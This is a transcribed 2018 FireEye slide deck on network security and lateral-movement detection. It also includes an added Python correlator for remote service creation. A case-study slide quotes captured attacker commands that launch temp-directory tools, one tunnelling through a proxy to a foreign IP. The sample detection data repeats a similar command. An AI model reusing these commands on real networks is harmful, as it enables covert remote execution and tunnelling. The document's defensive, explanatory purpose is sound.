Defending Against Evolving Network Security Threats

Apr 19, 2020

Page 1: Defending Against Evolving Network Security Threats - FireEye...©2018 FireEye Network Security Today Sophisticated Hiding in plain sight Credential reuse Rapid evasion creation Persistent

Defending Against Evolving Network Security Threats

Page 2

©2018 FireEye

Network Security Today

Sophisticated: hiding in plain sight, credential reuse, rapid evasion creation

Persistent: targeted, innovative, customized

Professional: determined, organized, well funded

101 days: average days before a breach was detected*

$3.62M: average cost of a breach**

Page 3

Compounding Factors: Threat Actors aren't the Only Challenge

Lack of resources to quickly and effectively address threats

Lack of visibility into traffic as networks expand

Driving the need to reduce dwell time and limit exposure

Page 4

New Developments in Network Security

Network Security (NX 6500) & Smart Grid (VX 12550)

File & Content Security (FX 6500)

Network Forensics (PX/IA)

SmartVision

Page 5

Network Security Topology

[Diagram: DC and DMZ segments behind a router, NG firewall and switch; user segments Engineering, HR and Marketing; private and public servers (Web, DNS, App, Email, File); products placed in the diagram: Network Security (NX, vNX), File Content Security (FX), SmartVision, Email Security, Endpoint Security, Mobile, Central Management, PX and IA]

Page 6

New Developments in Network Security (NX & FX)

"Five Styles of Advanced Threat Defense Framework"

§ Style 3 – Payload Analysis (aka Sandboxing) – NX/FX

§ Style 2 – Network Forensics – PX/IA

§ Style 1 – Network Traffic Analysis (NTA) – SmartVision

(Highlighted on this slide: Payload Analysis)

Page 7

Network Security 5th Generation Portfolio

Appliances: NX 6500, NX 5500, NX 4500, NX 4400, NX 3500, NX 2500, NX 1500, NX 2550; VX 12550 and VX 5500 MVX Smart Grid; Cloud MVX

GREATER STORAGE: 2x storage to hold more metadata and alerts

GREATER VALUE: new 5th generation appliances set a new standard for price/performance; SSL Intercept

GREATER PORT DENSITY: twice the port density provides greater flexibility and scalability as networks grow

NEW: 10Gbps

ADVANCED DETECTION: ML modules for exfiltration detection, SSL beaconing and fingerprinting, MalwareGuard analysis

Page 8

Malware that Targets Files and Content

• Detect and block malware in file shares and content stores

• Detects advanced malware that bypasses AV

• Optimized for SharePoint and OneDrive

[Diagram: an infected file moving between end users and the file share/data store in the data center, inspected by File Protect FX 6500]

Page 9

New Developments in Network Forensics

"Five Styles of Advanced Threat Defense Framework"

§ Style 3 – Payload Analysis (aka Sandboxing) – NX/FX

§ Style 2 – Network Forensics – PX/IA

§ Style 1 – Network Traffic Analysis (NTA) – SmartVision

(Highlighted on this slide: Network Forensics)

Page 10

FireEye Network Forensics – A Complete Solution

◆ Packet capture (PX) – a “security camera” to record and replay network traffic and flows

▶ What happened?

▶ What was involved?

▶ What was taken?

◆ Investigation Analysis (IA) – a source to manage multiple “security cameras”

◆ A tool that correlates events and asks questions:

“How many times in the last three months did this guy….. with the red hat and the dark beard….. appear on any of our cameras….. while carrying a brown briefcase?”

Page 11

Detect a broad array of security incidents, improve the quality of your response and precisely quantify the impact of each incident

High-Performance Packet Capture That Grows with Your Network

High-Fidelity Data Analysis

THREAT HUNTING: perform retrospective threat hunting and analysis

EXTENSIVE VISIBILITY: session decoder support for a myriad of protocols & file types

FLEXIBLE PLATFORM: scales to meet distributed and large enterprise needs; subscription pricing and expandable storage licenses

HIGH PERFORMANCE: record speeds of up to 20Gbps

LOSSLESS PACKET CAPTURE: vital to effective network forensic investigations

INTELLIGENT CAPTURE: selective packet filtering for maximum efficiency

ULTRAFAST SEARCH: leverage unique indexing architecture for fast answers

EASY DRILL DOWN: quickly respond to alerts that matter

INTEGRATED INTEL: add rich context to IOCs and alerts

Page 12

New Developments – SmartVision

"Five Styles of Advanced Threat Defense Framework"

§ Style 3 – Payload Analysis (aka Sandboxing) – NX/FX

§ Style 2 – Network Forensics – PX/IA

§ Style 1 – Network Traffic Analysis (NTA) – SmartVision

(Highlighted on this slide: Network Traffic Analysis)

Page 13

Anatomy of the Attack Life Cycle

Stages: Initial Recon, Initial Compromise, Establish Foothold, Escalate Privileges, Internal Recon, Move Laterally, Maintain Presence, Complete Mission (Maintain Presence and Move Laterally repeat as the attacker expands access)

Observable activity annotated on the diagram:

Malware download, C&C

Installation of fileless malware such as Mimikatz

Network mapping, host & service enumeration, user hunting

Files and objects moved over Windows SMB protocols

Unusual file transfer activity from ADMIN

Use of persistence mechanisms, such as Volume Boot Record (VBR) modification

Page 14

SmartVision – Demonstration

Page 15

Why SmartVision

◆ Born from real-world investigation monitoring

◆ Attackers consistently find ways around existing security controls

◆ Once inside, attackers must leverage the existing environment to access systems

◆ Lack of investment by attackers in novel lateral movement

◆ Well-defined protocols used differently by attackers and administrators

Page 16

Enterprise Network Architecture with SmartVision

[Diagram: data center behind router, firewall and switch; segments Engineering, HR and Marketing; File, App, Email and DNS servers; a remote office; a PCI network and a SCADA network; NX at the perimeter and SmartVision sensors placed on the internal segments]

Page 17

SmartVision Internals

◆ Monitor internal protocols for base events:

▶ SMB, SMB2, DCERPC, WinRM

◆ Record protocol metadata for triage review:

▶ DNS, HTTP, TLS, RTSP, SIP, SSH, SMTP, POP3, RDP, SMB, SMB2, DCERPC, IRC

◆ Correlate individual "base" events as they occur

◆ Some "base" events are definitively evil

◆ Other "base" events require correlation

Page 18

SmartVision Example Correlation

◆ Remote Service Created and Started

[Diagram of the correlated DCERPC base events: ROpenSCManagerW, then CreateServiceW OR RCreateServiceWOW64W, then RStartServiceW, optionally followed by RDeleteService]
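The "Remote Service Created and Started" correlation on this slide, together with the distinction on page 17 between base events that are "definitively evil" on their own and base events that "require correlation", can be illustrated with a small stateful correlator. The following is an added example written for this page; it is not SmartVision code and does not reproduce FireEye's rule logic. The event fields, the 300-second correlation window, the standalone heuristic (a service binary path that launches a command shell from the Windows temp directory, modelled on the page 27 capture), and all sample events are constructed assumptions.

```python
"""Toy correlator for DCERPC (MS-SCMR) base events. Added example, not product code."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Operations named on the slide. CreateServiceW and its WOW64 variant are
# alternatives; RDeleteService is optional cleanup after the start.
OPEN_OPS = {"ROpenSCManagerW"}
CREATE_OPS = {"CreateServiceW", "RCreateServiceWOW64W"}
START_OPS = {"RStartServiceW"}
DELETE_OPS = {"RDeleteService"}

WINDOW_SECONDS = 300.0  # assumed correlation window, not a product setting


@dataclass(frozen=True)
class BaseEvent:
    ts: float         # seconds since capture start
    src: str
    dst: str
    protocol: str     # "DCERPC", "SMB2", ...
    op: str           # operation name as decoded from the wire
    detail: str = ""  # e.g. service name and binary path


@dataclass
class Alert:
    name: str
    src: str
    dst: str
    base_events: List[BaseEvent]   # the base events behind the high-level alert
    cleaned_up: bool = False       # RDeleteService seen after the start

    @property
    def ops(self) -> List[str]:
        return [e.op for e in self.base_events]


@dataclass
class _Partial:
    events: List[BaseEvent]
    stage: int  # 1 = SCM opened, 2 = service created, waiting for start


def is_standalone_suspicious(ev: BaseEvent) -> bool:
    """A base event that needs no correlation (assumed heuristic)."""
    d = ev.detail.lower()
    return ev.op in CREATE_OPS and "cmd /c" in d and "\\windows\\temp\\" in d


class Correlator:
    def __init__(self, window: float = WINDOW_SECONDS) -> None:
        self.window = window
        self._partial: Dict[Tuple[str, str], _Partial] = {}
        self._recent: Dict[Tuple[str, str], Alert] = {}
        self.alerts: List[Alert] = []

    def _raise(self, name: str, src: str, dst: str, events: List[BaseEvent]) -> Alert:
        alert = Alert(name, src, dst, list(events))
        self.alerts.append(alert)
        return alert

    def feed(self, ev: BaseEvent) -> List[Alert]:
        """Consume one base event; return the alerts it raised (possibly none)."""
        raised: List[Alert] = []
        if ev.protocol != "DCERPC":
            return raised  # other protocols are only recorded as metadata here
        key = (ev.src, ev.dst)

        if is_standalone_suspicious(ev):
            raised.append(self._raise("Suspicious Service Binary Path", ev.src, ev.dst, [ev]))

        if ev.op in DELETE_OPS:
            prev = self._recent.get(key)  # attach cleanup to a recent alert
            if prev and ev.ts - prev.base_events[-1].ts <= self.window:
                prev.base_events.append(ev)
                prev.cleaned_up = True
            return raised

        partial = self._partial.get(key)
        if partial and ev.ts - partial.events[0].ts > self.window:
            self._partial.pop(key)  # stale partial sequence: start over
            partial = None

        if ev.op in OPEN_OPS:
            self._partial[key] = _Partial([ev], 1)
        elif partial and ev.op in CREATE_OPS and partial.stage == 1:
            partial.events.append(ev)
            partial.stage = 2
        elif partial and ev.op in START_OPS and partial.stage == 2:
            partial.events.append(ev)
            self._partial.pop(key)
            alert = self._raise("Remote Service Created and Started", ev.src, ev.dst, partial.events)
            self._recent[key] = alert
            raised.append(alert)
        return raised


# Constructed sample events (addresses, service names and paths are made up).
SAMPLE_EVENTS = [
    # Session A: full sequence, then the service is deleted (cleanup)
    BaseEvent(100.0, "10.0.0.5", "10.0.0.20", "DCERPC", "ROpenSCManagerW"),
    BaseEvent(100.4, "10.0.0.5", "10.0.0.20", "DCERPC", "CreateServiceW", "svc=upd bin=c:\\windows\\system32\\upd.exe"),
    BaseEvent(100.9, "10.0.0.5", "10.0.0.20", "DCERPC", "RStartServiceW", "svc=upd"),
    BaseEvent(101.5, "10.0.0.5", "10.0.0.20", "DCERPC", "RDeleteService", "svc=upd"),
    # Session B: existing service started, nothing created (e.g. an admin restart)
    BaseEvent(200.0, "10.0.0.7", "10.0.0.21", "DCERPC", "ROpenSCManagerW"),
    BaseEvent(200.3, "10.0.0.7", "10.0.0.21", "DCERPC", "RStartServiceW", "svc=spooler"),
    # Session C: suspicious binary path flagged on its own; the start arrives after the window
    BaseEvent(300.0, "10.0.0.9", "10.0.0.22", "DCERPC", "ROpenSCManagerW"),
    BaseEvent(300.2, "10.0.0.9", "10.0.0.22", "DCERPC", "RCreateServiceWOW64W", 'svc=tmp bin=cmd /c "start c:\\windows\\temp\\EXAMPLE.exe"'),
    BaseEvent(301.0, "10.0.0.9", "10.0.0.22", "SMB2", "TreeConnect", "share=IPC$"),
    BaseEvent(900.0, "10.0.0.9", "10.0.0.22", "DCERPC", "RStartServiceW", "svc=tmp"),
]


def run(events: List[BaseEvent] = SAMPLE_EVENTS) -> List[Alert]:
    c = Correlator()
    for ev in sorted(events, key=lambda e: e.ts):
        c.feed(ev)
    return c.alerts


if __name__ == "__main__":
    for a in run():
        print(f"{a.name}: {a.src} -> {a.dst} ops={a.ops} cleaned_up={a.cleaned_up}")
```

Session A produces the correlated alert with the optional RDeleteService attached, session B produces nothing because no service was created, and session C shows the two tiers: the create event is flagged on its own, while the sequence rule never fires because the start falls outside the window. Each alert keeps its base events, which is what page 21 describes as base events with their own metadata being available for analysis.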

Page 19

Case Study 1: Credential Dumping

◆ Mandiant responds to an incident

◆ Active attacker targeting a consulting firm

◆ Attacker is attempting to access data concerning the consulting firm's clients

◆ Mandiant deploys SmartVision sensors to critical network segments

Page 20

Case Study 1: Credential Dumping (slide content not captured in the transcript)

Page 21

Case Study 1: Credential Dumping

◆ Base events are visible for each high-level alert

◆ Base events contain their own metadata, which is available for analysis

Pages 22–25

Case Study 1: Credential Dumping (slide content not captured in the transcript)

Page 26

Case Study 2: Lateral Movement

◆ IT provider. Initial intrusion happened before start of "Proof-of-Concept"

◆ Attacker using VPN to access the environment. No backdoors.

◆ SmartVision recorded lateral movement and remote command execution on systems

Page 27

Case Study 2: Lateral Movement

◆ IT provider. Initial intrusion happened before start of "Proof-of-Concept"

◆ Attacker using VPN to access the environment. No backdoors.

◆ SmartVision recorded lateral movement and remote command execution on systems

[Packet capture excerpt shown on the slide: SMB traffic to \\AD-SERVER-IP-REDACTED\IPC$ over a named pipe carrying remote command execution. Recoverable command strings: cmd /c "start c:\windows\temp\sk.exe -proxy CHINESE-IP-REDACTED 443 8099" and cmd /c "start c:\windows\temp\p.exe -s 8087 -dir c:\win (the second command is cut off on the slide)]

Page 28

Case Study 2: Lateral Movement (slide content not captured in the transcript)

Page 29

Case Study 3: Reconnaissance + Remote Execution

◆ Car manufacturer

◆ BADRABBIT ransomware deployed to select systems

◆ Reconnaissance activity on servers during ransomware attack

Pages 30–32

Case Study 3: Reconnaissance + Remote Execution (slide content not captured in the transcript)

Page 33

SmartVision Roadmap

◆ More correlation rules

◆ More protocols supported

◆ Unsupervised machine learning

◆ User-interface improvements for quick alert triage

Page 34

Thank You

Page 35

OCTOBER 1 – 4, 2018 | WASHINGTON, D.C.

Practical Experience, Best Practice Guidance

Brian Barnett, CEO, Luz Technologies

Page 36

Who We Are? (bullet text not captured in the transcript)

Page 37

Common Challenges to Our Methods (bullet text not captured in the transcript)

Page 38

Things We've Actually Heard

Page 39

Things We've Actually Heard (continued)

Page 40

The Importance of Perimeter Complexity

Page 41

What We Look For

Page 42

How We Leverage NX Technology

Page 43

Best Practice Guidance

The Inside Threat••••

Page 45: Defending Against Evolving Network Security Threats - FireEye...©2018 FireEye Network Security Today Sophisticated Hiding in plain sight Credential reuse Rapid evasion creation Persistent

Eggs In One Basket••

•••

Page 46: Defending Against Evolving Network Security Threats - FireEye...©2018 FireEye Network Security Today Sophisticated Hiding in plain sight Credential reuse Rapid evasion creation Persistent

Kinetic vs Persistent

•••

•••

Page 47

OCTOBER 1 – 4, 2018 | WASHINGTON, D.C.

Thank You

Brian Barnett, CEO, Luz Technologies